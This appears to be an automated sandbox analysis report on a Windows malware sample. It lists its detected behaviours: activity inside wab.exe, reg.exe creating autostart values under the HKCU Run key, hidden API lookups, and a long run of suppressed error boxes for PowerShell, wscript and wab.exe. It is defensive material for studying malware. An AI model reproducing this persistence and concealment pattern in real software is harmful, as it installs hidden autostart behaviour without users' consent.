Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0328EE6C push esi; retf	26_2_0328EE97

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden			Jump to behavior

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

18_2_004047CB

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
